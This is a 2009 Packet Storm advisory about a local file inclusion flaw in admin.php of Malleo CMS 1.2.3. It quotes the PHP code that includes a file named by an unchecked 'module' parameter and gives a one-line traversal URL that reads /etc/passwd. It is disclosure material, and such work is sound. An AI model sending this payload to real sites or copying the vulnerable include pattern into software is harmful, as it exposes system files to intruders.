Malleo 1.2.3 Local File Inclusion

2009-04-18T00:00:00
ID PACKETSTORM:76800
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-04-18T00:00:00

Description

                                        
                                            `******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Malleo  
[+] Version: 1.2.3  
[+] Website: http://www.malleo-cms.com  
  
[+] Bugs: [A] Local File Inclusion  
  
[+] Exploitation: Remote  
[+] Date: 17 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Local File Inclusion  
  
[-] Risk: low  
[-] File affected: admin.php  
  
This bug allows a privileged user to include local  
files. I decided to publish this bug for reporting  
security flaw only. The following is the vulnerable  
code:  
  
...  
  
$module = (isset($_GET['module']))?  
$_GET['module']:$cf->config['default_module_admin'];  
  
...  
  
}else{  
// Mise a jour de la date d'activite de la session fondateur  
if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();  
if (file_exists($root.$module))  
{  
include_once($root.$module);  
  
...  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Local File Inclusion  
  
http://www.site.com/path/admin.php?module=../../../../../etc/passwd  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
  
--   
Salvatore "drosophila" Fresta  
CWNP444351  
`